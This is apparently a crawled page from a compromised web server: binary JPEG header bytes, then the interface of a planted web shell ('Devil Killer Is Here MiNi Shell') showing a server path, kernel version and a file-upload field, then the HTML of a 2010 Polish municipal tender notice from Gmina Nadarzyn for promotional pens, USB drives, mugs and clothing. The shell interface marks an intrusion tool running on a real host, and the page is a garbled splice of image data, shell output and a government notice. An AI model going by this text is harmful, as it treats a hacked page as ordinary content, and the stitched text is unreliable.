JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100525/134567-N-2010.html

<p class="kh_header"><b>Nadarzyn: DOSTARCZANIE MATERIAŁÓW REKLAMOWYCH DLA GMINY NADARZYN
Część I.  Dostawa reklamowych materiałów biurowych i ceramicznych.
Część II. Dostawa reklamowych artykułów odzieżowych.</b><br>
<b>Numer ogłoszenia: 134567 - 2010; data zamieszczenia: 25.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nadarzyn , ul. Mszczonowska 19, 05-830 Nadarzyn, woj. mazowieckie, tel. 022 7298185, faks 022 7298175.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nadarzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTARCZANIE MATERIAŁÓW REKLAMOWYCH DLA GMINY NADARZYN
Część I.  Dostawa reklamowych materiałów biurowych i ceramicznych.
Część II. Dostawa reklamowych artykułów odzieżowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa nw. artykułów:
Część I. Dostawa reklamowych materiałów biurowych i ceramicznych.
1) Przeźroczyste długopisy - obudowa z tworzywa sztucznego zabarwionego jednolicie, z gumowym uchwytem, z bezbarwnym, przezroczystym klipsem do przypięcia długopisu oraz bezbarwnym, przeźroczystym włącznikiem; z wymiennym wkładem, z automatycznym mechanizmem włączającym wkład, oraz z trwałym, kolorowym nadrukiem po prawej stronie klipsa - zgodnie z wizualizacją (szczegóły do ustalenia).
Ilość: 1500 sztuk (próbka artykułu do akceptacji zamawiającego)
Wkłady w kolorze niebieskim:
500 sztuk - obudowa przeźroczysta w kolorze zielonym
500 sztuk - obudowa przeźroczysta w kolorze niebieskim
Wkłady w kolorze czarnym:
500 sztuk - obudowa przeźroczysta w kolorze niebieskim
2) Pojemnik biurowy - (jednokomorowy pojemnik na długopisy, ołówki, flamastry itp.) z akrylu; z zegarem wielofunkcyjnym - mechanizm zegara elektroniczny z wyświetlaczem, w srebrnej obudowie, pod wyświetlaczem przyciski do ustawiania urządzenia, pozostała część pojemnika przeźroczysta. Podstawa pojemnika (dno) w kształcie półksiężyca (połowa elipsy). Wymiary: 11,8 x 10,5 cm. Dołączona 1 bateria. Trwały, kolorowy nadruk (lub grawerowanie laserowe) na srebrnej obudowie mechanizmu elektronicznego, pod przyciskami, z przodu pojemnika, na polu o wielkości 4,5cm wysokości x 6cm szerokości - zgodnie z wizualizacją (szczegóły do ustalenia).
Ilość: 250 sztuk (próbka artykułu do akceptacji zamawiającego).
3) Zestaw piśmienny (długopis + ołówek mechaniczny; w pudełku): 
- długopis z automatycznym mechanizmem włączającym wkład (przycisk u góry), obudowa z tworzywa sztucznego w kolorze zielonym z gumowym uchwytem ze srebrnymi wstawkami: przycisk włączający, klips służący do przypięcia długopisu, końcówka i cienka wstawka pomiędzy zieloną obudową a gumowym uchwytem; niebieski wkład; 
- mechaniczny ołówek - wygląd zewnętrzny: taki sam jak długopis; 
Zestaw w dobranym kolorystycznie plastikowym (przeźroczystym) pudełku o wymiarach: 16x5x3,5 cm. Trwały, kolorowy nadruk na długopisie i na ołówku - zgodnie z wizualizacją (szczegóły do ustalenia).
Ilość: 500 sztuk (próbka artykułu do akceptacji zamawiającego).
4) Pamięć USB 2GB - aluminium + plastik zielony (tworzy nierozłączną całość, aluminiowe zabezpieczenie nasuwane obrotowo na USB).
USB pakowane pojedynczo w papierowych pudełkach. Grawerowanie laserowe - zgodnie z wizualizacją (szczegóły do ustalenia).
Ilość: 200 sztuk (próbka artykułu do akceptacji zamawiającego).
5) Wizytownik aluminiowy - grawerowanie laserowe - zgodnie z wizualizacją (szczegóły do ustalenia).
Ilość: 200 sztuk - (próbka artykułu do akceptacji zamawiającego).
6) Elegancka pamięć USB 2GB - czarna, metalowa, owalna, z metalowym błyszczącym wykończeniem skuwki i USB; skuwka przymocowana do USB cienką metalową linką w przeźroczystej osnowie; po zamknięciu skuwki błyszczące, metalowe wykończenie skuwki i USB przylegają do siebie.
Na USB grawerowanie laserowe - zgodnie z wizualizacją (szczegóły do ustalenia).
USB Pakowane pojedynczo w pudełka.
Ilość: 100 sztuk (próbka artykułu do akceptacji zamawiającego).
7) Elegancki długopis metalowy (w aluminiowym pudełku), przekręcany, czarny, z metalowymi błyszczącymi wykończeniami, tj.: klips mocujący zamontowany na wierzchołku, końcówka długopisu oraz cienkie wstawki (ok. 1mm szerokości) w miejscu łączenia długopisu ze skuwką oraz ok. 1-1,5 cm od końca - od strony klipsa;
Tusz niebieski.
Na długopisie (po prawej stronie klipsa) grawerowanie laserowe - zgodnie z wizualizacją (szczegóły do ustalenia).
Aluminiowe pudełko, o wymiarach: 15,1cm x 2,9cm x 2cm, podstawa owalna; kolor czarny z błyszczącym metalowym wykończeniem: na spodzie i u góry oraz na łączeniu obydwu części.
Ilość: 100 sztuk (próbka artykułu do akceptacji zamawiającego).
8) Brelok - metalowy, błyszczący brelok z zielonym paskiem z PU. Na części metalowej grawerowanie laserowe - zgodnie z wizualizacją (szczegóły do ustalenia).
Pakowane pojedynczo w czarne ozdobne pudełka.
Ilość: 500 sztuk (próbka artykułu do akceptacji zamawiającego).
9) Torby papierowe, jasny brąz (ekologiczne), gramatura 170mg/m2 o wymiarach: 23,8cm x 32cm x 9 cm wzmacniane tekturą w miejscu mocowania uchwytów (sznurek bawełniany w kolorze zbliżonym do torby), usztywniane dno o wymiarach 23,8 cm x 9 cm; nadruk (3 kolory) na środku jednej ze stron torby - zgodnie z wizualizacją (szczegóły do ustalenia);
Ilość: 500 sztuk (próbka artykułu do akceptacji zamawiającego).
10) Kubki ceramiczne z uchwytem, białe o pojemności 300 ml, średnicy 8 cm, z trwale nadrukowaną na boku kolorową fotografią urzędu gminy, herbem i napisem - zgodnie z wizualizacją (szczegóły do ustalenia); wielkość nadruku ok. 12cm szerokości x 8cm wysokości; 
Ilość: 500 sztuk (próbka artykułu do akceptacji zamawiającego).
11) Filiżanki ceramiczne z uchem ze spodkami, w kolorze białym, obwód filiżanki: spód 4,2 cm, 8,7cm.; z trwałym nadrukiem (3 kolory) herbu Gminy Nadarzyn oraz napisem Nadarzyn nad herbem; wielkość nadruku: wys. 3 cm. szer. 2,1 cm - zgodnie z wizualizacją (szczegóły do ustalenia) 
Ilość: 200 sztuk (próbka artykułu do akceptacji zamawiającego).
12) Cukiernice ceramiczne z zamknięciem, w kolorze białym, stanowiących komplet z filiżankami, z trwałym nadrukiem (3 kolory) herbu Gminy Nadarzyn oraz napisem Nadarzyn nad herbem; wielkość nadruku: wys. 3 cm szer. 2,1 cm.
Ilość: 5 sztuk (próbka artykułu do akceptacji zamawiającego).

13) Dzbanki do kaw ceramiczne, w kolorze białym, stanowiące komplet z filiżankami, z trwałym nadrukiem (3 kolory) herbu Gminy Nadarzyn oraz napisem Nadarzyn nad herbem; wielkość nadruku: wys. 3 cm szer. 2,1 cm.
Ilość: 5 sztuk (próbka artykułu do akceptacji zamawiającego).

Część II. Dostawa reklamowych artykułów odzieżowych.
1) Koszulki bawełniane z krótkim rękawem polo (gramatura 200g/m2), kołnierzyk i zakończenie rękawa z tzw. ściągacza; po lewej stronie kolorowy haft (żółty, zielony, czarny) herbu Gminy Nadarzyn; oraz napis nad herbem Nadarzyn; haft umieszczony na lewej piersi; wielkość herbu: 4,8 cm szerokości, 5,7 cm wysokości; napis 0,5 cm nad herbem, wysokość liter: 0,7 cm. Koszulki pakowane pojedynczo w foliowe worki. 
Ilość: 200 sztuk (próbka artykułu do akceptacji zamawiającego).
100 sztuk w kolorze białym - czarny kolor haftu nad herbem Nadarzyn, 
100 sztuk w kolorze ciemnozielonym - żółty kolor haftu nad herbem (taki sam jak kolor tła herbu).
				
2) Koszulki bawełniane t-shirt (białe) ze ściągaczem przy szyi, gramatura 170 g/m2; z sitodrukiem umieszczonym na lewej piersi. Nadruk: kolorowy herb gminy Nadarzyn (żółty, zielony, czarny), nad nim napis w kolorze czarnym Nadarzyn- wielkość herbu: 4,8 cm szerokości, 5,7 cm wysokości; napis 0,5 cm nad herbem, wysokość liter: 0,7 cm. Koszulki pakowane pojedynczo w foliowe worki. 
Ilość: 200 sztuk (próbka artykułu do akceptacji zamawiającego).
20 sztuk w rozmiarze S,
20 sztuk w rozmiarze M,
70 sztuk w rozmiarze L,
70 sztuk w rozmiarze XL,
20 sztuk w rozmiarze XXL.
			
3) Czapeczki baseballowe (z regulowanym paskiem na rzep), bawełniane z daszkiem, rozmiar uniwersalny, 6 paneli, z kolorowym haftem umieszczonym z przodu czapki, ok. 1,5 cm nad daszkiem; haft: kolorowy (żółty, zielony, czarny) herb Gminy Nadarzyn nad nim czarny napis: Nadarzyn. Wielkość herbu: 2,7 cm x 4 cm, 2 mm na herbem napis Nadarzyn wysokość liter 4-5 mm.
Kolor czapeczek: beżowy, daszek z białą lamówką na brzegu, szerokości 2-3mm.
Ilość: 200 sztuk (próbka artykułu do akceptacji zamawiającego).
2. Na potwierdzenie, że oferowane dostawy spełniają wymagania Zamawiającego należy załączyć próbki wskazanych ww. artykułów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 39.22.11.20-4, 18.33.10.00-8, 18.44.33.40-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany podmiotu trzeciego (podwykonawcy), a nowy podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca, 
3)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nadarzyn.eobip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY NADARZYN, 05-830 NADARZYN, UL. MSZCZONOWSKA 19, Referat Inwestycji..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 14:00, miejsce: URZĄD GMINY NADARZYN, 05-830 NADARZYN, UL. MSZCZONOWSKA 19, pokój nr 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa reklamowych materiałów biurowych i ceramicznych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa nw. artykułów:
Część I. Dostawa reklamowych materiałów biurowych i ceramicznych.
1) Przeźroczyste długopisy - obudowa z tworzywa sztucznego zabarwionego jednolicie, z gumowym uchwytem, z bezbarwnym, przezroczystym klipsem do przypięcia długopisu oraz bezbarwnym, przeźroczystym włącznikiem; z wymiennym wkładem, z automatycznym mechanizmem włączającym wkład, oraz z trwałym, kolorowym nadrukiem po prawej stronie klipsa - zgodnie z wizualizacją (szczegóły do ustalenia).
Ilość: 1500 sztuk (próbka artykułu do akceptacji zamawiającego)
Wkłady w kolorze niebieskim:
500 sztuk - obudowa przeźroczysta w kolorze zielonym
500 sztuk - obudowa przeźroczysta w kolorze niebieskim
Wkłady w kolorze czarnym:
500 sztuk - obudowa przeźroczysta w kolorze niebieskim
2) Pojemnik biurowy - (jednokomorowy pojemnik na długopisy, ołówki, flamastry itp.) z akrylu; z zegarem wielofunkcyjnym - mechanizm zegara elektroniczny z wyświetlaczem, w srebrnej obudowie, pod wyświetlaczem przyciski do ustawiania urządzenia, pozostała część pojemnika przeźroczysta. Podstawa pojemnika (dno) w kształcie półksiężyca (połowa elipsy). Wymiary: 11,8 x 10,5 cm. Dołączona 1 bateria. Trwały, kolorowy nadruk (lub grawerowanie laserowe) na srebrnej obudowie mechanizmu elektronicznego, pod przyciskami, z przodu pojemnika, na polu o wielkości 4,5cm wysokości x 6cm szerokości - zgodnie z wizualizacją (szczegóły do ustalenia).
Ilość: 250 sztuk (próbka artykułu do akceptacji zamawiającego).
3) Zestaw piśmienny (długopis + ołówek mechaniczny; w pudełku): 
- długopis z automatycznym mechanizmem włączającym wkład (przycisk u góry), obudowa z tworzywa sztucznego w kolorze zielonym z gumowym uchwytem ze srebrnymi wstawkami: przycisk włączający, klips służący do przypięcia długopisu, końcówka i cienka wstawka pomiędzy zieloną obudową a gumowym uchwytem; niebieski wkład; 
- mechaniczny ołówek - wygląd zewnętrzny: taki sam jak długopis; 
Zestaw w dobranym kolorystycznie plastikowym (przeźroczystym) pudełku o wymiarach: 16x5x3,5 cm. Trwały, kolorowy nadruk na długopisie i na ołówku - zgodnie z wizualizacją (szczegóły do ustalenia).
Ilość: 500 sztuk (próbka artykułu do akceptacji zamawiającego).
4) Pamięć USB 2GB - aluminium + plastik zielony (tworzy nierozłączną całość, aluminiowe zabezpieczenie nasuwane obrotowo na USB).
USB pakowane pojedynczo w papierowych pudełkach. Grawerowanie laserowe - zgodnie z wizualizacją (szczegóły do ustalenia).
Ilość: 200 sztuk (próbka artykułu do akceptacji zamawiającego).
5) Wizytownik aluminiowy - grawerowanie laserowe - zgodnie z wizualizacją (szczegóły do ustalenia).
Ilość: 200 sztuk - (próbka artykułu do akceptacji zamawiającego).
6) Elegancka pamięć USB 2GB - czarna, metalowa, owalna, z metalowym błyszczącym wykończeniem skuwki i USB; skuwka przymocowana do USB cienką metalową linką w przeźroczystej osnowie; po zamknięciu skuwki błyszczące, metalowe wykończenie skuwki i USB przylegają do siebie.
Na USB grawerowanie laserowe - zgodnie z wizualizacją (szczegóły do ustalenia).
USB Pakowane pojedynczo w pudełka.
Ilość: 100 sztuk (próbka artykułu do akceptacji zamawiającego).
7) Elegancki długopis metalowy (w aluminiowym pudełku), przekręcany, czarny, z metalowymi błyszczącymi wykończeniami, tj.: klips mocujący zamontowany na wierzchołku, końcówka długopisu oraz cienkie wstawki (ok. 1mm szerokości) w miejscu łączenia długopisu ze skuwką oraz ok. 1-1,5 cm od końca - od strony klipsa;
Tusz niebieski.
Na długopisie (po prawej stronie klipsa) grawerowanie laserowe - zgodnie z wizualizacją (szczegóły do ustalenia).
Aluminiowe pudełko, o wymiarach: 15,1cm x 2,9cm x 2cm, podstawa owalna; kolor czarny z błyszczącym metalowym wykończeniem: na spodzie i u góry oraz na łączeniu obydwu części.
Ilość: 100 sztuk (próbka artykułu do akceptacji zamawiającego).
8) Brelok - metalowy, błyszczący brelok z zielonym paskiem z PU. Na części metalowej grawerowanie laserowe - zgodnie z wizualizacją (szczegóły do ustalenia).
Pakowane pojedynczo w czarne ozdobne pudełka.
Ilość: 500 sztuk (próbka artykułu do akceptacji zamawiającego).
